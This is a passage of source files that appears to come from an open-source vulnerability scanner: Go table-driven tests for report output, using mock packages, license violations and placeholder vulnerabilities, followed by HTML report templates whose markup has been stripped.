newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "5.9.0", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_some_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{"Apache-2.0"}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"dev", "optional"}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"dev", "optional"}, Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{"Apache-2.0"}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"build"}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "author1/mine1", Version: "1.2.3", Ecosystem: "Packagist", Extractor: composerlock.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{"Apache-2.0"}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "NuGet", Extractor: packageslockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "author1/mine1", Version: "1.2.3", Ecosystem: "Packagist", Extractor: composerlock.Extractor{}, }), DepGroups: []string{"dev"}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_multiple_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT", "Apache-2.0"}, LicenseViolations: []models.License{"MIT", "Apache-2.0"}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_some_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT", "Apache-2.0"}, LicenseViolations: []models.License{"MIT"}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"UNKNOWN"}, LicenseViolations: []models.License{"UNKNOWN"}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() run(t, tt.args) }) } } func testOutputWithMixedIssues(t *testing.T, run outputTestRunner) { t.Helper() cwd := filepath.ToSlash(testutility.GetCurrentWorkingDirectory(t)) experimentalAnalysisConfig := models.ExperimentalAnalysisConfig{ Licenses: models.ExperimentalLicenseConfig{Summary: false, Allowlist: []models.License{"ISC"}}, } tests := []outputTestCase{ { name: "one_source_with_one_package,_one_vulnerability,_and_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: true}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: false}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "two_sources_with_packages,_one_vulnerability,_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "5.9.0", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{}, Vulnerabilities: []*osvschema.Vulnerability{}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{"Apache-2.0"}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Commit: "abcxzy", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Ecosystem: "npm", Commit: "abc123", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{"Apache-2.0"}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1"}, MaxSeverity: "7.8", ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: false}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-2"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-2": {Called: true}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: false}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{"Apache-2.0"}, }, }, }, }, }, }, }, { name: "one_source_with_one_deprecated_package", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/lockfile", pkginfo{ Name: "deprecated-pkg", Version: "1.0.0", Ecosystem: "npm", Deprecated: true, Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, }, }, }, }, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() run(t, tt.args) }) } } ================================================ FILE: internal/output/html/base_image_template.gohtml ================================================
{{ $totalVuln := .VulnTypeSummary.All }} {{ range .ImageInfo.AllBaseImages}} {{ end }}
OS version: {{ .ImageInfo.OS }}
{{ if gt (len .AllLayers) 0}}
play_arrow
{{ end }} 		{{ if eq .Index 0}} Your image: {{ else }} Base image {{ .Index }}: {{ end }} {{ getBaseImageName . }} ({{ .Count.AnalysisCount.Regular }}/{{ $totalVuln }} vulnerabilities)
{{ range .AllLayers }} {{ $index := .Index }} {{ $originalCommand := .LayerMetadata.Command }} {{ $commandSet := formatLayerCommand $originalCommand }} {{ $command := index $commandSet 0 }} {{ $commandDetail := index $commandSet 1 }} {{ $diffID := .LayerMetadata.DiffID }} {{ $longCommand := false }} {{ if gt (len $command) 109 }} {{ $longCommand = true }} {{ end }} {{ $hasVuln := false }} {{ if gt .Count.AnalysisCount.Regular 0 }} {{ $hasVuln = true }} {{ end }}

{{ .Index }} {{ $command }}

{{ if $longCommand }} {{ $originalCommand }} {{ end }}
{{ if $hasVuln }} {{ template "severity_summary_template.gohtml".Count.SeverityCount }} {{ end }}
{{ end }}
================================================ FILE: internal/output/html/deprecated_package_template.gohtml ================================================
play_arrow View deprecated packages
{{ range $ecosystem := .Ecosystems }} {{ range $source := $ecosystem.Sources }} {{ range $package := $source.Packages }} {{ if $package.Deprecated }} {{ end }} {{ end }} {{ end }} {{ end }}
Ecosystem Package Name Version
{{ $ecosystem.Name }} {{ $package.Name }} {{ $package.InstalledVersion }}
================================================ FILE: internal/output/html/filter_template.gohtml ================================================
{{ if .IsContainerScanning }}
Layer

keyboard_arrow_down

All layers ({{ .VulnCount.AnalysisCount.Regular }})

{{ template "severity_summary_template.gohtml" .VulnCount.SeverityCount }}
{{ range .ImageInfo.AllLayers }} {{ $index := .Index }} {{ $originalCommand := .LayerMetadata.Command }} {{ $commandSet := formatLayerCommand $originalCommand }} {{ $command := index $commandSet 0 }} {{ $commandDetail := index $commandSet 1 }} {{ $diffID := .LayerMetadata.DiffID }} {{ $longCommand := false }} {{ if gt (len $command) 109 }} {{ $longCommand = true }} {{ end }} {{ if gt .Count.AnalysisCount.Regular 0 }}

{{ $index }} {{ $command }}

{{ if $longCommand }} {{ $originalCommand }} {{ end }}
{{ template "severity_summary_template.gohtml".Count.SeverityCount }}
{{ end }} {{ end }}
{{ end }}
Filters

(/{{ add .VulnTypeSummary.All .VulnTypeSummary.Hidden }})

keyboard_arrow_down
{{ if hasOSResult .Ecosystems }} {{ end }} {{ if hasOSResult .Ecosystems }} {{ end }}
Overall Severity

{{ .VulnCount.SeverityCount.Critical }} Critical

{{ .VulnCount.SeverityCount.High }} High

{{ .VulnCount.SeverityCount.Medium }} Medium

{{ .VulnCount.SeverityCount.Low }} Low

{{ .VulnCount.SeverityCount.Unknown }} Unknown

================================================ FILE: internal/output/html/license_summary_template.gohtml ================================================
play_arrow View license summary
{{ range . }} {{ end }}
{{ .Name }}:{{ .Count }}
================================================ FILE: internal/output/html/package_table_template.gohtml ================================================ {{ if isOSResult .Type }} {{ else }} {{ end }} {{ $showLicense := false }} {{ if gt .LicenseViolationsCount 0 }} {{ $showLicense = true }} {{ end }} {{ range $rowIndex, $element := .Packages }} {{ $index := uniqueID }} {{ $isUncalled := false }} {{ if eq $element.VulnCount.AnalysisCount.Regular 0 }} {{ $isUncalled = true }} {{ end }} {{ $hasLicenseViolations := false }} {{ if gt (len .LicenseViolations) 0 }} {{ $hasLicenseViolations = true }} {{ end }} {{ if not $isUncalled }} {{ else }} {{ end }} {{ if $showLicense }} {{ if $hasLicenseViolations}} {{ else }} {{ end }} {{ end }} {{ end }}
Source PackagePackageInstalled version

Fix available

Fix available indicates whether a patch or update exists to address the vulnerabilities found in the corresponding package.

Vulnerability count

Vulnerability count shows the number of vulnerabilities found in the package, counted by each severity level.
License violations
play_arrow
{{ $element.Name }} {{ if ne $element.InstalledVersion "" }} {{ $element.InstalledVersion }} {{ else if ne $element.Commit "" }}
@{{ GetShortCommit $element.Commit }}
Commit: {{ $element.Commit }}
{{ end }}
{{ if ne $element.VulnCount.FixableCount.UnFixed 0 }} {{ if eq $element.VulnCount.FixableCount.Fixed 0}}

No fix available

All {{ $element.VulnCount.AnalysisCount.Regular }} vulnerabilities have no fixed version available. {{ else }}

Partial fixes available

Upgrading the package can fix {{ $element.VulnCount.FixableCount.Fixed }} out of {{ $element.VulnCount.AnalysisCount.Regular }} vulnerabilities. {{ end }} {{ else }}

Fix available

Upgrading the package can fix all {{ $element.VulnCount.FixableCount.Fixed }} vulnerabilities. {{ end }}
{{ template "severity_summary_template.gohtml" $element.VulnCount.SeverityCount }}

Filtered out

{{ getFilteredVulnReasons $element.HiddenVulns }}

{{ formatLicense .LicenseViolations }} --
{{ $binaries := formatSlice $element.OSPackageNames }} {{ if not (eq $binaries "") }}

Installed binaries: {{ $binaries }}

{{ end }} {{ if and $element.LayerDetail.LayerInfo.LayerMetadata (not (eq $element.LayerDetail.LayerInfo.LayerMetadata.Command "")) }} {{ $index := $element.LayerDetail.LayerIndex }} {{ $diffID := $element.LayerDetail.LayerInfo.LayerMetadata.DiffID }} {{ $baseImageIndex := $element.LayerDetail.LayerInfo.LayerMetadata.BaseImageIndex }} {{ $originalCommand := $element.LayerDetail.LayerInfo.LayerMetadata.Command }} {{ $commandSet := formatLayerCommand $originalCommand }} {{ $command := index $commandSet 0 }} {{ $commandDetail := index $commandSet 1 }} {{ $longCommand := false }} {{ if gt (len $command) 109 }} {{ $longCommand = true }} {{ end }}
{{ if $longCommand }}

Introduced in layer # {{ $index }}: 

{{ $command }}

{{ $originalCommand }}
{{ else if ne $commandDetail "" }}

Introduced in layer # {{ $index }}: 

{{ $command }}

{{ $commandDetail }}
{{ else }}

Introduced in layer # {{ $index }}: 

{{ $command }}

{{ end }}

In base image: {{ if eq $baseImageIndex 0 }} False {{ else }} {{ getBaseImageName $element.LayerDetail.BaseImageInfo }}{{ end }}

{{ end }} {{ template "vuln_table_template.gohtml" $element }}
================================================ FILE: internal/output/html/package_view_template.gohtml ================================================ {{ range . }}

{{ .Name }}

{{ range .Sources }}

Source: {{ .Name }}

{{ template "package_table_template.gohtml" . }}
{{ end }}
{{ end }} ================================================ FILE: internal/output/html/report_template.gohtml ================================================ Vulnerability Scan Report

Open Source Vulnerabilities

Scanning summary

{{ template "filter_template.gohtml" .}} {{ if .IsContainerScanning }} {{ template "base_image_template.gohtml" .}} {{ end }} {{ if .LicenseSummary.Summary }} {{ template "license_summary_template.gohtml" .LicenseSummary.LicenseCount }} {{ end }} {{ if gt .PkgDeprecatedCount 0 }} {{ template "deprecated_package_template.gohtml" . }} {{ end }}
search
{{template "package_view_template.gohtml" .Ecosystems}}
